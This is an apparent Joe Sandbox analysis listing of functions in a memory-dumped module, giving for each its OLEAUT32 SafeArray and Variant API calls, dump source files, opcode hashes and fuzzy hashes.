Function 6C90840E Relevance: 13.8, APIs: 9, Instructions: 332COMMON

Download Yara Rule

APIs

SafeArrayGetLBound.OLEAUT32(?,00000001,?), ref: 6C9084BF
SafeArrayGetUBound.OLEAUT32(?,00000001,?), ref: 6C9084D2
SafeArrayGetElement.OLEAUT32 ref: 6C90850A

Part of subcall function 6C903A90: SafeArrayGetLBound.OLEAUT32(?,00000001,?), ref: 6C903B71
Part of subcall function 6C903A90: SafeArrayGetUBound.OLEAUT32(?,00000001,?), ref: 6C903B83

Part of subcall function 6C9069C0: SafeArrayGetLBound.OLEAUT32(?,00000001,00000000), ref: 6C906A08
Part of subcall function 6C9069C0: SafeArrayGetUBound.OLEAUT32(?,00000001,?), ref: 6C906A15
Part of subcall function 6C9069C0: SafeArrayGetElement.OLEAUT32(?,?,?), ref: 6C906A41

SafeArrayDestroy.OLEAUT32(?), ref: 6C90AE63
SafeArrayDestroy.OLEAUT32(?), ref: 6C90AE73
SafeArrayDestroy.OLEAUT32(?), ref: 6C90AE86
SafeArrayDestroy.OLEAUT32(?), ref: 6C90AE99
SafeArrayDestroy.OLEAUT32(?), ref: 6C90AEAC
SafeArrayDestroy.OLEAUT32(?), ref: 6C90AEBF

Part of subcall function 6C8FDFB0: SafeArrayGetLBound.OLEAUT32(?,00000001,00000000), ref: 6C8FDFF6
Part of subcall function 6C8FDFB0: SafeArrayGetUBound.OLEAUT32(?,00000001,?), ref: 6C8FE003
Part of subcall function 6C8FDFB0: SafeArrayGetElement.OLEAUT32(?,?,?), ref: 6C8FE02F

Memory Dump Source

Source File: 00000000.00000002.1384971621.000000006C8E1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C8E0000, based on PE: true

Associated: 00000000.00000002.1384909940.000000006C8E0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1385630538.000000006C964000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1385787961.000000006C97E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1385822311.000000006C980000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1385918382.000000006C981000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1385966714.000000006C983000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1386079703.000000006C98A000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1386079703.000000006C98C000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1386217873.000000006C98E000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c8e0000_TT4ybwWc1T.jbxd

Similarity

API ID: ArraySafe$Bound$Destroy$Element
String ID:
API String ID: 959723449-0
Opcode ID: 47ab4755c05063f2aef9f16a715a8f1c2df6a4eda2cdeeb3a57a148f78debfcf
Instruction ID: 4a97787b034546c5f07f21bbd95fcedb8050e0d494e926c7bfe636c270d4fa66
Opcode Fuzzy Hash: 47ab4755c05063f2aef9f16a715a8f1c2df6a4eda2cdeeb3a57a148f78debfcf
Instruction Fuzzy Hash: 08C17E70B012049FDB14DF68CD80FA9B7B9AF94308F20859DE919EB786DB71E985CB50

Uniqueness

Uniqueness Score: -1.00%

Function 6C904170 Relevance: 13.8, APIs: 9, Instructions: 277COMMON

Download Yara Rule

APIs

VariantInit.OLEAUT32(?), ref: 6C9041AF
VariantInit.OLEAUT32(?), ref: 6C9041B5
SafeArrayCreateVector.OLEAUT32(0000000C,00000000,00000001), ref: 6C9041C0
SafeArrayPutElement.OLEAUT32(00000000,00000000,?), ref: 6C9041F5
VariantClear.OLEAUT32(?), ref: 6C904201
std::tr1::_Xweak.LIBCPMT ref: 6C904450
SafeArrayDestroy.OLEAUT32(?), ref: 6C90446D
VariantClear.OLEAUT32(?), ref: 6C90447D
VariantClear.OLEAUT32(?), ref: 6C904483

Memory Dump Source

Source File: 00000000.00000002.1384971621.000000006C8E1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C8E0000, based on PE: true

Associated: 00000000.00000002.1384909940.000000006C8E0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1385630538.000000006C964000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1385787961.000000006C97E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1385822311.000000006C980000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1385918382.000000006C981000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1385966714.000000006C983000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1386079703.000000006C98A000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1386079703.000000006C98C000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1386217873.000000006C98E000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c8e0000_TT4ybwWc1T.jbxd

Similarity

API ID: Variant$ArrayClearSafe$Init$CreateDestroyElementVectorXweakstd::tr1::_
String ID:
API String ID: 1774866819-0
Opcode ID: b6fa0021fc94f0dc4309c815a1e646c4ddb9f89dece5ba3c59595461d76713df
Instruction ID: bbf69fe0487ba3d76e90b5c60c5366b1181f7429ac0ad134293c4e7c225cad02
Opcode Fuzzy Hash: b6fa0021fc94f0dc4309c815a1e646c4ddb9f89dece5ba3c59595461d76713df
Instruction Fuzzy Hash: EAB14775600609AFCB14DF99C884DEAB7F9BF8D300F15856CE50AABB90DA34F941CB60

Uniqueness

Uniqueness Score: -1.00%

Function 6C90C850 Relevance: 13.8, APIs: 9, Instructions: 271COMMON

Download Yara Rule

APIs

VariantInit.OLEAUT32(?), ref: 6C90C88F
VariantInit.OLEAUT32(?), ref: 6C90C895
SafeArrayCreateVector.OLEAUT32(0000000C,00000000,00000001), ref: 6C90C8A0
SafeArrayPutElement.OLEAUT32(00000000,00000000,?), ref: 6C90C8D5
VariantClear.OLEAUT32(?), ref: 6C90C8E1
std::tr1::_Xweak.LIBCPMT ref: 6C90CB1C
SafeArrayDestroy.OLEAUT32(?), ref: 6C90CB39
VariantClear.OLEAUT32(?), ref: 6C90CB49
VariantClear.OLEAUT32(?), ref: 6C90CB4F

Memory Dump Source

Source File: 00000000.00000002.1384971621.000000006C8E1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C8E0000, based on PE: true

Associated: 00000000.00000002.1384909940.000000006C8E0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1385630538.000000006C964000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1385787961.000000006C97E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1385822311.000000006C980000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1385918382.000000006C981000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1385966714.000000006C983000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1386079703.000000006C98A000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1386079703.000000006C98C000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1386217873.000000006C98E000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c8e0000_TT4ybwWc1T.jbxd

Similarity

API ID: Variant$ArrayClearSafe$Init$CreateDestroyElementVectorXweakstd::tr1::_
String ID:
API String ID: 1774866819-0
Opcode ID: d66831e243f70fffe9e666c2335549488bc180a1d077ff2acab7c5f40097c8fe
Instruction ID: 6aa0cf9dc18ef4ae9d6cf9ff5b09bb9a710c0545e3e8b61eda9a5feb1961c264
Opcode Fuzzy Hash: d66831e243f70fffe9e666c2335549488bc180a1d077ff2acab7c5f40097c8fe
Instruction Fuzzy Hash: A1B149756006099FCB14DF99C884DEAB7F9BF8D300F15866DE506ABB91CA34F941CB60

Uniqueness

Uniqueness Score: -1.00%

Function 6C90C530 Relevance: 13.8, APIs: 9, Instructions: 259COMMON

Download Yara Rule

APIs

VariantInit.OLEAUT32(?), ref: 6C90C56F
VariantInit.OLEAUT32(?), ref: 6C90C575
SafeArrayCreateVector.OLEAUT32(0000000C,00000000,00000001), ref: 6C90C580
SafeArrayPutElement.OLEAUT32(00000000,?,?), ref: 6C90C5B5
VariantClear.OLEAUT32(?), ref: 6C90C5C1
std::tr1::_Xweak.LIBCPMT ref: 6C90C7D4
SafeArrayDestroy.OLEAUT32(?), ref: 6C90C7F1
VariantClear.OLEAUT32(?), ref: 6C90C801
VariantClear.OLEAUT32(?), ref: 6C90C807

Memory Dump Source

Source File: 00000000.00000002.1384971621.000000006C8E1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C8E0000, based on PE: true

Associated: 00000000.00000002.1384909940.000000006C8E0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1385630538.000000006C964000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1385787961.000000006C97E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1385822311.000000006C980000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1385918382.000000006C981000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1385966714.000000006C983000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1386079703.000000006C98A000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1386079703.000000006C98C000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1386217873.000000006C98E000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c8e0000_TT4ybwWc1T.jbxd

Similarity

API ID: Variant$ArrayClearSafe$Init$CreateDestroyElementVectorXweakstd::tr1::_
String ID:
API String ID: 1774866819-0
Opcode ID: e7a6ca4d4415b07d60d902b6664d8a258e6f4b6b7c364327155cdfebf31b579d
Instruction ID: 4e4c16efea1113c479f5f317ca83a8b1954e1e589ac781639332dc8f257bbe35
Opcode Fuzzy Hash: e7a6ca4d4415b07d60d902b6664d8a258e6f4b6b7c364327155cdfebf31b579d
Instruction Fuzzy Hash: FFA147756006099FCB14DFA9C884EAAB7F9BF8D310F15856CE506ABB90DB34F941CB60

Uniqueness

Uniqueness Score: -1.00%

Function 6C906880 Relevance: 13.6, APIs: 9, Instructions: 117COMMON

Download Yara Rule

APIs

VariantInit.OLEAUT32(?), ref: 6C9068B2
VariantInit.OLEAUT32(?), ref: 6C9068BD
SafeArrayCreateVector.OLEAUT32(0000000C,00000000,00000002), ref: 6C9068D7
SafeArrayPutElement.OLEAUT32(00000000,?,?), ref: 6C9068FD
VariantClear.OLEAUT32(?), ref: 6C906909
SafeArrayPutElement.OLEAUT32(00000000,?,?), ref: 6C906923
SafeArrayDestroy.OLEAUT32(00000000), ref: 6C906981
VariantClear.OLEAUT32(?), ref: 6C90699E
VariantClear.OLEAUT32(?), ref: 6C9069A4

Memory Dump Source

Source File: 00000000.00000002.1384971621.000000006C8E1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C8E0000, based on PE: true

Associated: 00000000.00000002.1384909940.000000006C8E0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1385630538.000000006C964000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1385787961.000000006C97E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1385822311.000000006C980000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1385918382.000000006C981000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1385966714.000000006C983000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1386079703.000000006C98A000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1386079703.000000006C98C000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1386217873.000000006C98E000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c8e0000_TT4ybwWc1T.jbxd

Similarity

API ID: Variant$ArraySafe$Clear$ElementInit$CreateDestroyVector
String ID:
API String ID: 3529038988-0
Opcode ID: b286aa55caf84b3d6dc49c3ec0b2f74d31b2b6383aaf692d6c546310fed4506b
Instruction ID: 4705f7507cb584d526f215da97b8ff039189ee9b56a0e0ae5c057f5fe9abe25a
Opcode Fuzzy Hash: b286aa55caf84b3d6dc49c3ec0b2f74d31b2b6383aaf692d6c546310fed4506b
Instruction Fuzzy Hash: 84417EB2A00209AFDB00DFA5C844AEEBBB8EF99314F15411DE915A7740E775EA45CFA0

Uniqueness

Uniqueness Score: -1.00%

Function 6C8FC020 Relevance: 12.3, APIs: 8, Instructions: 309COMMON

Download Yara Rule

APIs

VariantInit.OLEAUT32(?), ref: 6C8FC074
VariantInit.OLEAUT32(?), ref: 6C8FC07B
VariantInit.OLEAUT32(?), ref: 6C8FC082
VariantInit.OLEAUT32(?), ref: 6C8FC089
VariantClear.OLEAUT32(?), ref: 6C8FC312
VariantClear.OLEAUT32(?), ref: 6C8FC319
VariantClear.OLEAUT32(?), ref: 6C8FC320
VariantClear.OLEAUT32(?), ref: 6C8FC327

Memory Dump Source

Source File: 00000000.00000002.1384971621.000000006C8E1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C8E0000, based on PE: true

Associated: 00000000.00000002.1384909940.000000006C8E0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1385630538.000000006C964000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1385787961.000000006C97E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1385822311.000000006C980000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1385918382.000000006C981000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1385966714.000000006C983000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1386079703.000000006C98A000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1386079703.000000006C98C000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1386217873.000000006C98E000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c8e0000_TT4ybwWc1T.jbxd

Similarity

API ID: Variant$ClearInit
String ID:
API String ID: 2610073882-0
Opcode ID: d44e74fffeb05e1ff1a0409b5b1c039512b4588780b1de984d45f128fa74f371
Instruction ID: 4cec8560e99277c9fc5322e0e7a35c2c9a75e409621d3a9b35625c9b61e6e48d
Opcode Fuzzy Hash: d44e74fffeb05e1ff1a0409b5b1c039512b4588780b1de984d45f128fa74f371
Instruction Fuzzy Hash: C5C157716087009FC320EF68C98095ABBE5FFC9348F248E5DE5A487765D770E946CB92

Uniqueness

Uniqueness Score: -1.00%

Function 6C906B10 Relevance: 9.4, APIs: 6, Instructions: 364COMMON

Download Yara Rule

APIs

SafeArrayGetLBound.OLEAUT32(00000000,?,?), ref: 6C906C8B
SafeArrayGetUBound.OLEAUT32(00000000,?,?), ref: 6C906CA6
SafeArrayAccessData.OLEAUT32(00000000,?), ref: 6C906CC7

Part of subcall function 6C905760: std::tr1::_Xweak.LIBCPMT ref: 6C905769

SafeArrayUnaccessData.OLEAUT32(00000000), ref: 6C906CF9

Part of subcall function 6C949BB5: _malloc.LIBCMT ref: 6C949BCF

SafeArrayDestroy.OLEAUT32(00000000), ref: 6C906F13
InterlockedCompareExchange.KERNEL32(6C98C6A4,45524548,4B4F4F4C), ref: 6C906F34

Memory Dump Source

Source File: 00000000.00000002.1384971621.000000006C8E1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C8E0000, based on PE: true

Associated: 00000000.00000002.1384909940.000000006C8E0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1385630538.000000006C964000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1385787961.000000006C97E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1385822311.000000006C980000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1385918382.000000006C981000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1385966714.000000006C983000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1386079703.000000006C98A000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1386079703.000000006C98C000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1386217873.000000006C98E000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c8e0000_TT4ybwWc1T.jbxd

Similarity

API ID: ArraySafe$BoundData$AccessCompareDestroyExchangeInterlockedUnaccessXweak_mallocstd::tr1::_
String ID:
API String ID: 2722669376-0
Opcode ID: c09212a303b9e7471b24d4a6f92c1850ef5d3f3aa435f7c407f477e1223949dc
Instruction ID: 25f3f18ce52b961b42cb13e10676e0521eff9ac7eb50e7b51ee4b35d7c33c6c3
Opcode Fuzzy Hash: c09212a303b9e7471b24d4a6f92c1850ef5d3f3aa435f7c407f477e1223949dc
Instruction Fuzzy Hash: 81D1E471A002059FDB10CFA8C895BEE77BCAF45308F148969E915EBB80D774E994CBA1

Uniqueness

Uniqueness Score: -1.00%

Function 6C8F16B0 Relevance: 9.2, APIs: 4, Strings: 1, Instructions: 487COMMON

Download Yara Rule

APIs

Part of subcall function 6C949BB5: _malloc.LIBCMT ref: 6C949BCF

std::tr1::_Xweak.LIBCPMT ref: 6C8F1B53
std::_Xinvalid_argument.LIBCPMT ref: 6C8F1B5D
std::exception::exception.LIBCMT ref: 6C8F1C43
__CxxThrowException@8.LIBCMT ref: 6C8F1C58

Strings

invalid vector<T> subscript, xrefs: 6C8F1B58

Memory Dump Source

Source File: 00000000.00000002.1384971621.000000006C8E1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C8E0000, based on PE: true

Associated: 00000000.00000002.1384909940.000000006C8E0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1385630538.000000006C964000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1385787961.000000006C97E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1385822311.000000006C980000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1385918382.000000006C981000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1385966714.000000006C983000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1386079703.000000006C98A000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1386079703.000000006C98C000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1386217873.000000006C98E000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c8e0000_TT4ybwWc1T.jbxd

Similarity

API ID: Exception@8ThrowXinvalid_argumentXweak_mallocstd::_std::exception::exceptionstd::tr1::_
String ID: invalid vector<T> subscript
API String ID: 3098024973-3016609489
Opcode ID: 049eb886e46d53e426ec49dccef7ef1aee2ac5f178296e5484362a2177a3bd72
Instruction ID: e35d3ee125df83bf82e6fe97014a21150ae12c2e38599280a755a7565a14511a
Opcode Fuzzy Hash: 049eb886e46d53e426ec49dccef7ef1aee2ac5f178296e5484362a2177a3bd72
Instruction Fuzzy Hash: 52223CB1D007499FCB20CFA4C5809DEBBF5BF44354F118A6DD45AABB50E734AA89CB90

Uniqueness

Uniqueness Score: -1.00%

Function 6C90908A Relevance: 9.1, APIs: 6, Instructions: 103COMMON

Download Yara Rule

APIs

SafeArrayDestroy.OLEAUT32(?), ref: 6C90AE63
SafeArrayDestroy.OLEAUT32(?), ref: 6C90AE73
SafeArrayDestroy.OLEAUT32(?), ref: 6C90AE86
SafeArrayDestroy.OLEAUT32(?), ref: 6C90AE99
SafeArrayDestroy.OLEAUT32(?), ref: 6C90AEAC
SafeArrayDestroy.OLEAUT32(?), ref: 6C90AEBF

Memory Dump Source

Source File: 00000000.00000002.1384971621.000000006C8E1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C8E0000, based on PE: true

Associated: 00000000.00000002.1384909940.000000006C8E0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1385630538.000000006C964000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1385787961.000000006C97E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1385822311.000000006C980000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1385918382.000000006C981000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1385966714.000000006C983000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1386079703.000000006C98A000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1386079703.000000006C98C000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1386217873.000000006C98E000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c8e0000_TT4ybwWc1T.jbxd

Similarity

API ID: ArrayDestroySafe
String ID:
API String ID: 4225690600-0
Opcode ID: 184c2ea19c2772278a3a1354ecef20c8d52947a9553d13aa0343d5d9ecbb3b26
Instruction ID: d63fea5836ca560e4adf597adb2fa0607363307c0f23e74574775cb684ea41fb
Opcode Fuzzy Hash: 184c2ea19c2772278a3a1354ecef20c8d52947a9553d13aa0343d5d9ecbb3b26
Instruction Fuzzy Hash: 0A313B70F016189FDB10CB68CD80B9EB7BDAF99204F20858AE519E7651DB75ED41CF90

Uniqueness

Uniqueness Score: -1.00%

Function 6C903C10 Relevance: 7.7, APIs: 5, Instructions: 186COMMON

Download Yara Rule

APIs

SafeArrayGetElement.OLEAUT32(?,?,65628154), ref: 6C903C49
VariantInit.OLEAUT32(?), ref: 6C903C81
VariantClear.OLEAUT32(?), ref: 6C903D26
VariantClear.OLEAUT32(?), ref: 6C903D30
VariantClear.OLEAUT32(?), ref: 6C903D89

Memory Dump Source

Source File: 00000000.00000002.1384971621.000000006C8E1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C8E0000, based on PE: true

Associated: 00000000.00000002.1384909940.000000006C8E0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1385630538.000000006C964000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1385787961.000000006C97E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1385822311.000000006C980000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1385918382.000000006C981000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1385966714.000000006C983000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1386079703.000000006C98A000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1386079703.000000006C98C000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1386217873.000000006C98E000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c8e0000_TT4ybwWc1T.jbxd

Similarity

API ID: Variant$Clear$ArrayElementInitSafe
String ID:
API String ID: 4110538090-0
Opcode ID: b9687b8f0eb503d0fe256688eaae1ca8c2af873c6c7185f70ba71a4f4470d149
Instruction ID: 5f0b8b5d3432d3fa0ea4dfeb1cdc8edcde1b988556b527d98d50336195b09036
Opcode Fuzzy Hash: b9687b8f0eb503d0fe256688eaae1ca8c2af873c6c7185f70ba71a4f4470d149
Instruction Fuzzy Hash: 16615876A002499FCB00DFA8C8809AEBBB9FF59314F2485ADE515EB750C731E945CBA0

Uniqueness

Uniqueness Score: -1.00%

Function 6C8FDB30 Relevance: 7.6, APIs: 5, Instructions: 85COMMON

Download Yara Rule

APIs

VariantInit.OLEAUT32(6C9031EC), ref: 6C8FDB5E
SafeArrayCreateVector.OLEAUT32(0000000C,00000000,00000001), ref: 6C8FDB6E
SafeArrayPutElement.OLEAUT32(00000000,?,?), ref: 6C8FDB82
SafeArrayDestroy.OLEAUT32(00000000), ref: 6C8FDBF1
VariantClear.OLEAUT32(?), ref: 6C8FDBFB

Memory Dump Source

Source File: 00000000.00000002.1384971621.000000006C8E1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C8E0000, based on PE: true

Associated: 00000000.00000002.1384909940.000000006C8E0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1385630538.000000006C964000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1385787961.000000006C97E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1385822311.000000006C980000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1385918382.000000006C981000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1385966714.000000006C983000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1386079703.000000006C98A000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1386079703.000000006C98C000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1386217873.000000006C98E000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c8e0000_TT4ybwWc1T.jbxd

Similarity

API ID: ArraySafe$Variant$ClearCreateDestroyElementInitVector
String ID:
API String ID: 182531043-0
Opcode ID: f47d77d1a8e25907249f21ed1d4dc16dcd0e11640168bf91d063fea9493a8858
Instruction ID: 93920959392bda0134ccf998897461704687197ee53cc834eeb44cbe74040c21
Opcode Fuzzy Hash: f47d77d1a8e25907249f21ed1d4dc16dcd0e11640168bf91d063fea9493a8858
Instruction Fuzzy Hash: E631C376A04205AFD700DF95C944EEEB7F8FF9A710F11815AEA10A7740D734A901CFA0

Uniqueness

Uniqueness Score: -1.00%

Function 6C94A42D Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 75COMMON

Download Yara Rule

APIs

__CRT_INIT@12.LIBCMT ref: 6C94A463
__CRT_INIT@12.LIBCMT ref: 6C94A493
__CRT_INIT@12.LIBCMT ref: 6C94A4B3

Strings

a0, xrefs: 6C94A4FF

Memory Dump Source

Source File: 00000000.00000002.1384971621.000000006C8E1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C8E0000, based on PE: true

Associated: 00000000.00000002.1384909940.000000006C8E0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1385630538.000000006C964000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1385787961.000000006C97E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1385822311.000000006C980000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1385918382.000000006C981000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1385966714.000000006C983000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1386079703.000000006C98A000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1386079703.000000006C98C000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1386217873.000000006C98E000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c8e0000_TT4ybwWc1T.jbxd

Similarity

API ID: T@12
String ID: a0
API String ID: 456891419-3188653782
Opcode ID: 6a0f78731bd38ae5c8ea083b45a201e60d38fbb58e92b22d8c7f93cc98e044b2
Instruction ID: 8ccd18f9f8457c2c5e0b850415b930c660267f679d2a6675bfb503b7a195c96d
Opcode Fuzzy Hash: 6a0f78731bd38ae5c8ea083b45a201e60d38fbb58e92b22d8c7f93cc98e044b2
Instruction Fuzzy Hash: 2E112770D1125265DB709A774C4CFAF7ABC9B92798F10D538F465E6A80DF34C541CA60

Uniqueness

Uniqueness Score: -1.00%

Function 6C90C410 Relevance: 6.1, APIs: 4, Instructions: 112COMMON

Download Yara Rule

APIs

SafeArrayGetLBound.OLEAUT32(?,00000001,?), ref: 6C90C478
SafeArrayGetUBound.OLEAUT32(?,00000001,?), ref: 6C90C488
SafeArrayGetElement.OLEAUT32(?,00000001,?), ref: 6C90C4B4
SafeArrayDestroy.OLEAUT32(?), ref: 6C90C512

Memory Dump Source

Source File: 00000000.00000002.1384971621.000000006C8E1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C8E0000, based on PE: true

Associated: 00000000.00000002.1384909940.000000006C8E0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1385630538.000000006C964000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1385787961.000000006C97E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1385822311.000000006C980000.00000008.00000001.01000000.00000007.sdmpDownload File
